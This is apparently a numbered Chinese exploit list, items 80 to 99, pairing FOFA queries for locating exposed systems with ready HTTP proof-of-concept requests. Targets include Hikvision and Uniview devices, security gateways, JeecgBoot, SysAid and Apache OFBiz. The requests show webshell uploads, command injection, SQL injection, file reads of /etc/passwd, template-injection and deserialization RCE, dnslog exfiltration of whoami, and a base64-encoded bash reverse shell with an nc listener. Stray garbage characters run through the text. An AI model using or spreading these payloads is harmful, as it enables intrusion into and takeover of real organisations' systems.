3 h6 G( U" |1 K) E2 w- Q0 t; SGET /goform/webRead/open/?path=|id HTTP/1.1* Z/ P( z% J) t$ Q4 m2 ^1 I# p
Host:IP8 o3 {6 B, h* ~. R# O% g w! O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0! m4 a3 L- ~9 ?* f. H+ B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. _8 i$ z* ~) V+ E: i4 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 T6 N. X k7 ^3 n& Y9 P
Accept-Encoding: gzip, deflate
/ q. d1 c6 ?; j1 F$ }3 {Connection: close: O! r/ ?1 U- m! B0 y4 [2 ^2 r
Upgrade-Insecure-Requests: 16 y. N, O5 O, w3 y* v% B, E
1 w+ y L$ F; ^9 o& f$ E2 s) ~
9 k2 R6 z! V& C9 m80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
) T6 {. U! W6 |6 OFOFA:app="速达软件-公司产品"
3 U- P4 L: _- ^' A8 KPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1& b3 @% X/ p# T+ V! s+ W
Host: x.x.x.x8 w6 I5 f# R% i; T& X) N) z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, a4 `4 ?3 o+ [9 X8 @+ \
Content-Length: 27
. e1 Q( c% C: i0 Z) x. OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* u6 r+ y+ b: g9 L6 ~
Accept-Encoding: gzip, deflate
. g8 c" G( l9 m7 h4 ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ S* a1 k: x% Q- H( x4 u$ o: F
Connection: close1 z( N& ~9 m/ f1 B- C/ t1 v- b
Content-Type: application/octet-stream" I5 L. P' g+ A/ a$ Q6 Q: F1 M
Upgrade-Insecure-Requests: 1
' f1 b# t+ w! d$ N5 q# @$ B1 C
, y! |" I6 `: P5 j. q<% out.print("oessqeonylzaf");%>
. j6 J4 m Y/ B
9 @: b( b7 u) I7 e. X3 v% |2 Q# M3 D ]; r
GET /xykqmfxpoas.jsp HTTP/1.18 O( v% v7 P( S3 i
Host: x.x.x.x! `, R& w- m4 K* m9 \6 `3 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 b$ k, j. x q. s
Connection: close
: h8 V9 [, _8 ~8 Y3 Z( p* bAccept-Encoding: gzip8 W' J& c8 n0 W+ A, }6 E5 B
2 l: Z5 f# m; ?) ^& k C/ ~1 h1 b" U5 F2 Q# Q7 K
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& y }. y5 I9 w8 v7 q2 z l7 `8 DFOFA:app="uniview-视频监控"
( J) h1 c, d, a3 HGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1, }' g. Q6 o3 b r
Host: x.x.x.x
& _% r$ a) f" E) S) _) D& TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( h/ B" W# z) ?! ^* Z+ Y" {
Connection: close
0 g1 X9 w0 q3 s: }& w ]% X0 yAccept-Encoding: gzip$ D: a2 o) d5 `* u5 [, T( s: |" @5 |
" [! o& d' F S/ I& V4 E0 T/ u/ V4 d* C" n7 W1 v) h
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行& h6 R) S: q4 m- b3 ?, u3 v
FOFA:app="思福迪-LOGBASE"
$ u" P$ f6 o$ {* G2 jPOST /bhost/test_qrcode_b HTTP/1.1
! A1 X$ D- r) `, @8 pHost: BaseURL& a1 s2 U8 V9 U! K
User-Agent: Go-http-client/1.1
7 p* P* m* D: B1 n* {/ }0 t5 c9 ~. JContent-Length: 23
/ n& T( H) G" r; g, e+ SAccept-Encoding: gzip
5 q- D) B: H% j( c2 |Connection: close
) u2 w" ~0 M9 Z& EContent-Type: application/x-www-form-urlencoded
; h0 H: C+ F" ~4 \Referer: BaseURL: t! b+ L# J* E. O2 a) X% E: c6 d
% i2 Y) g* P2 b7 [( `4 J$ S; E
z1=1&z2="|id;"&z3=bhost7 W: }) I" U, f' x
7 ^4 |( r* Z% Q; f( L2 M
2 H6 _. b( d# ~% s! u- P6 K
83. JeecgBoot testConnection 远程命令执行( f2 @0 [) F" y
FOFA:title=="JeecgBoot 企业级低代码平台"
; f* o) y7 F& g7 Y% w E/ U" y- s; O1 W& i7 {8 s# X
2 [8 D# F$ ^3 t/ N E6 OPOST /jmreport/testConnection HTTP/1.1' j3 F7 Y! T3 |7 C1 E4 f
Host: x.x.x.x; {; x0 B8 ^* h8 ~2 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, h& b$ A. }" w, f LConnection: close7 T2 h/ q/ q+ K4 P5 n+ i, j- f7 S
Content-Length: 8881" u+ q# P2 U6 r6 ~' J5 a
Accept-Encoding: gzip
2 D" W7 S# S3 g) G k$ ~Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"# c. \3 R8 B P# `9 [' j: g
Content-Type: application/json. M0 L5 Y0 x; }0 N; r; ]. M
9 H, _; l; z2 N$ Y/ I: \( X; t/ h
PAYLOAD
: {1 l5 u8 b f
. Z; J0 L6 w* N) G! e( ]84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; q$ v& }3 A$ _2 X" G5 TFOFA:title=="JeecgBoot 企业级低代码平台") ?5 L- h3 @. K' r2 z5 F- V
: r. F" u& @: w
/ n" Q" n+ M- R3 M( f
" j ^/ e) D" }6 K3 ` y$ fPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
' e9 |* u" v# @6 y7 w' zHost: 192.168.40.130:8080# O' v. ^9 W$ m3 O
User-Agent: curl/7.88.1* V# J1 S- \- C- K- U
Content-Length: 156
; P5 b+ N0 m( `8 H: |# |5 RAccept: */*
) P: F, N' M6 i0 |$ B" M. |Connection: close, k0 } Z6 T; \
Content-Type: application/json7 T8 Z$ _2 h7 W
Accept-Encoding: gzip
! }4 E% V- b- m
8 b4 y+ Q. @6 N. u5 L{& W4 M3 D9 ]* o2 b% S
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
1 W$ s/ m- w" v u' F "type": "0"# e$ Z- |6 D: P4 Y
}
( z$ A2 W: ]6 n0 K( Y: A0 K7 s
8 d% ^# L: J6 j
% k3 S; H+ Q0 T; j85. SysAid On-premise< 23.3.36远程代码执行/ a9 A+ S8 _# f' W3 g5 H
CVE-2023-472467 {# a& j$ x3 t+ Z" D& L; _3 ?. I
FOFA:body="sysaid-logo-dark-green.png"
: Q0 a- F: \ n3 G3 c: K) o1 m) ] @! uEXP数据包如下,注入哥斯拉马# \4 g% m' N# {8 j2 T0 Q' c3 ]
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
5 i5 H n4 X+ ]5 pHost: x.x.x.x
9 T& j! d+ }2 ]2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 I" x( H+ S" @Content-Type: application/octet-stream
3 K$ x- X/ e( }2 }Accept-Encoding: gzip
+ y" e3 {/ j8 ?2 p' d' s5 Q& `5 A3 x ?% i# d+ R
PAYLOAD
' u3 n$ u9 {2 N0 `! m; B- H
. a4 N' u4 G- j2 L回显URL:http://x.x.x.x/userfiles/index.jsp+ M" \2 J8 X, _( c8 D
" ?- j% ]$ `( F) h- d9 O86. 日本tosei自助洗衣机RCE
7 t. J; ^3 ^3 x5 ?FOFA:body="tosei_login_check.php") T' F3 {1 V7 v: U9 i
POST /cgi-bin/network_test.php HTTP/1.1: c5 H; C ~) E3 X# q
Host: x.x.x.x8 s4 B! A7 M* r- |
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 P& k& C' w9 H7 \( j( c2 y2 WConnection: close
3 N! |7 ], T% O5 ? WContent-Length: 44
% d8 r/ [; q' e( S# `6 }4 {Accept: */*
5 a' A$ n$ t! iAccept-Encoding: gzip
: t" c& L/ `5 F1 r% h" F2 E# `Accept-Language: en
5 y+ S) O4 {( y+ k% V, P# m; kContent-Type: application/x-www-form-urlencoded
6 t3 \/ T; j: @# l
. @6 P- s: Y1 Thost=%0acat${IFS}/etc/passwd%0a&command=ping
! }. N( x o7 z& w* Q- Q3 H4 \3 n. r% \# H: i
8 j4 @$ c+ O' H87. 安恒明御安全网关aaa_local_web_preview文件上传+ ~* g3 x b4 t. W) C4 T
FOFA:title="明御安全网关"! S+ C- K8 s8 Q' Y1 |( F
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1) S# p& n9 \- L. g. z
Host: X.X.X.X) C$ z. h M0 A/ @. k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; h8 C* C" b3 y3 q6 F* {
Connection: close
5 v1 O# s7 I7 s; OContent-Length: 198
3 t, p$ a6 y2 B, }# T8 q- m) SAccept-Encoding: gzip
0 q8 P3 _5 ~3 f YContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd1 c4 J; h. ?/ Y. X/ d
; Z( [8 {& G. @4 }8 _
--qqobiandqgawlxodfiisporjwravxtvd
4 ^5 D0 I0 p) I/ K& x. QContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
* H A' p# m# a' @" {2 K5 W( |Content-Type: text/plain6 @8 s% ]+ g5 @( q* _6 R9 T0 m
2 L/ Z+ }8 A' i' N! H( y: }/ t2ZqGNnsjzzU2GBBPyd8AIA7QlDq
5 R4 P8 g- B: I- F1 \8 W' b' i5 e--qqobiandqgawlxodfiisporjwravxtvd--. B/ K* A) X2 t! _
) h- e* E6 D9 S8 A& e) W0 l5 u y1 j9 b! h5 d
/jfhatuwe.php' `4 l& w& h) n9 x
4 q! c( }$ u" K& A* _
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 W/ ?2 N4 K7 U1 ? uFOFA:title="明御安全网关"
+ F7 h: b! h/ S8 S) ]GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1' I. | O$ x- r6 S8 D
Host: x.x.x.xx.x.x.x P: ^& q8 g. a9 p7 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* t) ]. ~+ v7 r2 Y1 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" A, F( {% v/ e0 oAccept-Encoding: gzip, deflate
; p) d8 B2 r8 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 \, S. ~ v/ p; HConnection: close3 E' r; c7 j% C+ T s7 B
y7 R4 t% n- F$ W/ b0 m
' n' b2 Y3 w Q' A1 E! Z$ u) m/astdfkhl.php
: E* x# i5 ?( ? a" r9 P' {5 y' N7 V' [
89. 致远互联FE协作办公平台editflow_manager存在sql注入
' X2 U, l. Z! y" ]: H! y. E- T+ kFOFA:title="FE协作办公平台" || body="li_plugins_download"% O- N" q" _, U) A# L8 N7 J
POST /sysform/003/editflow_manager.js%70 HTTP/1.12 ^+ V1 |# D3 t, T. D3 [
Host: x.x.x.x
z3 p& U% K6 X7 n8 L) z5 ^ J' p6 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% u5 V9 R2 ?. l. E% ^% v
Connection: close
8 e. w- n2 L7 j6 s8 `; PContent-Length: 41
+ Y; |" I% L5 G) nContent-Type: application/x-www-form-urlencoded' b! t% b- f6 i
Accept-Encoding: gzip
g3 u) z4 V9 }$ L6 @4 p/ A5 K7 G6 {
1 z5 u( O' G0 noption=2&GUID=-1'+union+select+111*222--+
# t% W \3 t# X# b& x: v0 R- i
: j8 I9 L7 b ?: O8 Z0 R3 A' @# ] x
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# v* C( [5 s3 o8 }9 p. g
FOFA:icon_hash="-1830859634"4 s8 J% Z) D' }$ E
POST /php/ping.php HTTP/1.14 n! r* Y6 O7 N3 p }% \0 K) z( G
Host: x.x.x.x
, L0 q% [/ @6 M! D" a& HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0! n! A9 A. ~5 I# Y( U* A& L" v6 }: B- v( q) i
Content-Length: 512 M5 J* _/ A1 f' J
Accept: application/json, text/javascript, */*; q=0.01
. ~) c# ~3 `1 h4 R; K* V2 I+ G iAccept-Encoding: gzip, deflate, [3 R6 r( g2 ~; C$ E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 D# Q, D5 ^' ^, A; _/ ?5 w
Connection: close/ P- S, u, x9 ]8 k
Content-Type: application/x-www-form-urlencoded
0 w5 K* L4 {" l7 [; YX-Requested-With: XMLHttpRequest0 d3 N; a( ]5 I1 H9 B
! F- ^; B' Z- G8 d2 Q D7 F
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig# k* n' V+ I2 r% A3 ^
% k+ G5 \0 j+ F: \, D6 z
( S1 w# ^# l- [% ^) ?0 C; X& A- U
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取. p. a, p* a" \5 y9 _& z A# o; r
FOFA:title="综合安防管理平台"( e# H& Y& o& Z1 s2 Z
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
) N, k3 M' V& G; {3 \& |- BHost: your-ip! H+ E& n' z! |) z& ~. s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36. M, z: C0 j; q' i8 \/ Z
Accept-Encoding: gzip, deflate
+ _0 d# ?) \5 ^; H( GAccept: */*1 W! a% M8 s2 N- h0 r& Z
Connection: keep-alive% z, b3 p# F; U: z" Q6 h
* d* @, q/ j: {( o) p
2 g9 R; a% j% S k; M, U% p7 Z9 a
1 ]4 s- N5 j* J9 |92. 海康威视运行管理中心session命令执行1 s/ U% _/ I7 i0 i
Fastjson命令执行
9 M4 r$ |& X/ R: o6 `0 l3 Jhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
" V' z5 g: X) g& w' j$ z: h% nPOST /center/api/session HTTP/1.10 A+ h; R: a, N. w
Host:' b) A; y% y1 v# w; x6 E, T
Accept: application/json, text/plain, */*
5 d9 G6 c P* p( l4 ~Accept-Encoding: gzip, deflate! C# } w7 ]6 _$ V" b) M* s
X-Requested-With: XMLHttpRequest+ C6 p" u0 S5 i
Content-Type: application/json;charset=UTF-8) ~" C1 Z2 K3 Z, A3 B! `: H/ A
X-Language-Type: zh_CN4 X) s" L! h% {3 U c3 }
Testcmd: echo test
" E- t9 m5 H* N/ o! xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 E7 ]3 t' Y1 y: tAccept-Language: zh-CN,zh;q=0.9
* Q* I( z8 l2 g$ kContent-Length: 5778
) E% F2 X+ C3 }
2 V2 ~/ d Y% j1 Y; l! r5 z* S- [6 QPAYLOAD& y. s8 R' J) l6 n- o: M
- m+ m& t8 a Q, {; O: z
) h8 [, h0 M4 F) n x1 |; x
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
" X* z1 ^! R7 U3 g, s( ~FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 P4 Z1 F/ \6 l( x* a, Y/ E. lPOST /?g=app_av_import_save HTTP/1.1+ f4 O+ q* Q U8 X5 g* x
Host: x.x.x.x
, g- v' b+ A( G5 U( zContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
9 C' I7 \* z# Z; B" J* g' c( i! jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; N5 t9 v% Z$ ^8 X5 q2 z' z6 k: e
/ j0 b$ {: t# z) A5 ?9 {$ J) u------WebKitFormBoundarykcbkgdfx
% _. x5 s! Y( {. l! H) z! rContent-Disposition: form-data; name="MAX_FILE_SIZE"" _' K1 O3 t P* ^7 o5 F% Q
4 J0 |3 X. r; K2 O$ J10000000
( X+ }8 o6 k; M. z2 l1 ^------WebKitFormBoundarykcbkgdfx6 w" s2 B: T. i G
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"( M# Q D+ j( n% m0 n9 e( {
Content-Type: text/plain
. l3 R2 B/ \: H3 i# d0 {3 ]$ C% q) M# X) R' d6 S
wagletqrkwrddkthtulxsqrphulnknxa [; T5 X7 p5 _3 [3 B
------WebKitFormBoundarykcbkgdfx: e# s1 b" s# J5 c! Z
Content-Disposition: form-data; name="submit_post"
- n/ v; K; c0 @0 f' B/ u, J/ H. ~0 [5 m& J4 G
obj_app_upfile- y. p0 s2 o+ @" p$ s1 D% T
------WebKitFormBoundarykcbkgdfx2 ^9 c. Q( E: k- T! ]
Content-Disposition: form-data; name="__hash__"
8 S) A' O, Z. M( P3 M
' ] `: w6 g% G2 m5 c! V' A; l0b9d6b1ab7479ab69d9f71b05e0e9445! ?6 C& E9 k7 E6 u) @+ U7 v0 B( P
------WebKitFormBoundarykcbkgdfx--
+ Y, r2 y1 i2 I2 ?3 `8 q
c3 u7 T$ g% G$ [# H
/ B* X9 _% o1 O! ?GET /attachements/xlskxknxa.txt HTTP/1.1) h+ x( t2 F, k& m. t! f3 i
Host: xx.xx.xx.xx# H- x8 @$ g: F- p1 [( P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# y! P8 X0 R S0 o" U8 d
6 P$ M9 N( K- D. k/ I
5 T0 E* M7 w6 o* P
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
. R7 {3 U1 J$ l3 ~, B0 mFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
% w; X- |- U3 q" y3 X2 f8 GPOST /?g=obj_area_import_save HTTP/1.17 B5 x3 T! O* U r. ]
Host: x.x.x.x# y9 Q. O, [9 `) {& f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
+ @' Y( C, q( F) r' k# @+ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! P! j2 |5 c1 ^* I1 M! }. j8 ?7 M t
------WebKitFormBoundarybqvzqvmt
2 p, e: z3 h8 e& YContent-Disposition: form-data; name="MAX_FILE_SIZE"7 W2 g; ?4 {6 m5 t8 [% u
2 ]) h. J) q! b3 d+ C10000000
7 p* [# v/ f2 G------WebKitFormBoundarybqvzqvmt
* h) z( C+ D4 A7 K, rContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"! h- a/ m P6 g S8 j
Content-Type: text/plain
" H4 ?! k9 W9 h# r5 [# n
: J) \, s# @; Rpxplitttsrjnyoafavcajwkvhxindhmu0 n9 m" X! l* N- }8 k
------WebKitFormBoundarybqvzqvmt
/ [) @6 s' h/ g& `- kContent-Disposition: form-data; name="submit_post"
: ?+ Z, d# U0 p6 y1 I9 D8 H1 f2 t$ n! q9 {3 z
obj_app_upfile* \0 C8 s5 b: q) o
------WebKitFormBoundarybqvzqvmt4 u& j7 ]; q# }: C4 A+ J
Content-Disposition: form-data; name="__hash__"
" h# U3 W. T- @! g
( h0 }* U0 K4 ~. b7 q& y0b9d6b1ab7479ab69d9f71b05e0e94455 X# t- t8 x* z1 ~
------WebKitFormBoundarybqvzqvmt--
2 n: Q. I7 I2 x0 Q) R% [. ~7 g( }8 T6 Z5 h
4 \: v$ ~0 r" s% O$ q$ u/ n# g2 A% l# ]" C- u9 i+ F% z Q
GET /attachements/xlskxknxa.txt HTTP/1.1
+ @" S7 ?: p f& r- Z7 dHost: xx.xx.xx.xx5 d- V- l1 I" C) j9 e* C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% W6 [# l$ S6 c+ B
4 s% {- l/ A y# [' k" g
" o3 @! w" I* X/ h) c) ^: s. F- L1 x- E' K
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行2 l) V2 D/ n& M9 q: K, t; V
CVE-2023-49070
c% a/ W8 K$ d6 aFOFA:app="Apache_OFBiz"
9 Z3 Y& H- t/ I3 z: O4 ^1 ~POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.14 Q% O* X3 A, x4 ]: c# C- B
Host: x.x.x.x
g' G6 z6 L, K8 l1 Z. w2 w: ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 t! x5 |$ C/ A- L- s. ]Connection: close3 X% G2 g, B0 u; o3 |% i, w8 v8 \# d" e
Content-Length: 889
$ H' Q( k- A1 A- i* QContent-Type: application/xml' b# y3 j) W4 d6 B8 f. f: ]: E
Accept-Encoding: gzip
5 O) ]4 H" r4 z9 H4 R5 ~# ~
I, A- p) {) l/ ?) R<?xml version="1.0"?>) S2 a; k: \7 O' z0 j+ I( ` f
<methodCall>
. A, b4 J1 x. O4 ~/ N <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>" e; k. G- F. O4 \1 {
<params>
& A9 x2 t4 r* J" Q2 Y1 ]+ n <param>. Q% u3 q t/ `: l3 o- N7 F
<value>0 }! s0 _2 ^$ H
<struct>
* K' U5 p4 @) z% O: i6 q <member>8 M5 z1 i) _/ q2 _, G2 D! S4 O
<name>test</name>
" g5 M; c+ V% m& b2 h2 T <value>1 |/ Q0 ^ c! l& y- b( G! _' ]" Q
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
' b( Z4 @, w, O: E: F. x+ b$ X </value>% D T# z+ |, |- l' _6 x6 S$ r) \
</member>! M" H. @* U' p
</struct>
* F3 T) C. t" Y </value># t( o0 H' l( r1 \1 J3 M
</param>7 l& [2 G( h" {# o, H: z' p n
</params>! o4 S/ l* h* ^% r u( f' E
</methodCall>) D+ g4 S( b9 {& l1 |' a8 G
, g! ~ ?; l4 f5 U' c* p3 P5 N! t
* h p% x1 ?! P1 \1 Q K3 t+ J
用ysoserial生成payload
i0 g/ Y6 L/ j1 ~4 l) x& {3 sjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
& ]2 [3 V9 y# ^4 V- Z+ f1 F% x
& a8 C3 S% }0 G9 Q% ^) k" [- L$ w! R# l J8 Q' I* K* l
将生成的payload替换到上面的POC
; `* Z% V; d4 ]8 p0 RPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.13 |3 w. b( i: C8 Q3 F( T7 U" V
Host: 192.168.40.130:84436 `6 [/ q1 Q u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( P# |, _' v) s" L( I, S& i
Connection: close1 {; e# q3 I/ ?% t5 N
Content-Length: 889
6 D& q. j1 A5 h$ O: [Content-Type: application/xml
. p- t+ z- n+ M. sAccept-Encoding: gzip }2 J# H9 F2 A1 y' H
% ~+ {3 s7 B. A& _" G( uPAYLOAD
+ O6 C6 ^/ t( S
" |* \4 h$ G# B' s" T/ U96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ y" `$ w# K3 BFOFA:app="Apache_OFBiz"
7 w- Z& L) |) f8 TPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1! B- E4 a e+ H6 q+ |; F1 ^1 e
Host: localhost:8443
- ^4 j, n6 v4 ?+ `* N% pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* o2 j+ N. E+ x y1 ?Accept: */*$ m4 Q5 }0 s5 ?) \! A8 d: n" ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 _! E N) {- i D
Content-Type: application/x-www-form-urlencoded
' ?4 Z5 p/ q6 IContent-Length: 551 @9 v2 n- m# A
& u, L8 m" M# i8 }2 HgroovyProgram=throw+new+Exception('id'.execute().text);. z; ^+ x) x) m# W! s: P, e T
- Y- j/ Z) R& w
+ D5 E# r: J! @9 u0 [$ e
反弹shell
9 J- t5 x- @5 U! l0 z) C. s在kali上启动一个监听
) b! ?, H4 n& j9 d: V' K; v5 ]1 inc -lvp 7777
5 l8 o' I) M G( l0 x8 [. m+ b5 l2 A5 ]
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; A0 g' g& `6 A" S u) b% C
Host: 192.168.40.130:84433 ^3 _+ S5 y7 @! S( O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 m; G/ F% m% j0 U( [7 X
Accept: */*6 I$ y7 V0 B J/ a4 _+ t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! @: g5 Z% f1 ^ f( l" JContent-Type: application/x-www-form-urlencoded" d F0 o( i- v7 i1 W0 @0 `( Z f
Content-Length: 71
' T" o: T7 x) N; _9 o+ v5 ` r" k5 U! |6 x/ \4 h. k; b
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
: t0 \6 I( A; G4 n* m
6 X: k% [# g( h! o. c0 f97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; i# u0 C- S9 ?
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"0 ?+ D& l8 g' I$ ? s- ^/ N! C
GET /passport/login/ HTTP/1.1
" P9 [4 W# r8 v- {% tHost: 192.168.40.130:8085
" [6 q" ~. C0 O* q- @/ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! t6 H, L. f/ z7 e- SAccept-Encoding: gzip
" p4 t) i+ p# DConnection: close
5 j2 A6 s; v d" N8 h! u4 k" n2 fCookie: rememberMe=PAYLOAD5 A! P7 q& K: `6 a S* \
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"+ Y4 w. v5 Z" @" P7 `
& S' p+ Y" F) L% @4 t
6 f; _# T: B2 X4 ~. R5 Y
98. SpiderFlow爬虫平台远程命令执行 X9 f% r# f; b# ?- @: y
CVE-2024-01959 ^7 v1 @' Z8 |5 Z9 S% K* |
FOFA:app="SpiderFlow"* u, S: L0 T4 r8 L, G: |8 f
POST /function/save HTTP/1.12 x: y6 F$ F" s% E
Host: 192.168.40.130:8088
! s" z9 X. o. y7 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 n! t Y4 z7 U( i4 wConnection: close% A. _- E* V- C7 I
Content-Length: 121/ t% [8 q( K. r! i* l' k# Z
Accept: */*: {0 G! Q! ~8 m* ]
Accept-Encoding: gzip, deflate
1 t3 q, v9 D! G. T. AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 c* n2 f! w% o" |* w+ T. X
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 c3 j9 h7 e; `4 k
X-Requested-With: XMLHttpRequest8 {3 b$ _% c5 P9 D7 M
1 j$ K6 N7 D8 D2 q, F" g
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B/ t2 G. K* o5 G" V
" c/ i6 T" K7 U8 _% M
# f8 I! Q) N6 M- O" Z8 h99. Ncast盈可视高清智能录播系统busiFacade RCE! J% e& u: t6 z/ z1 O, J t
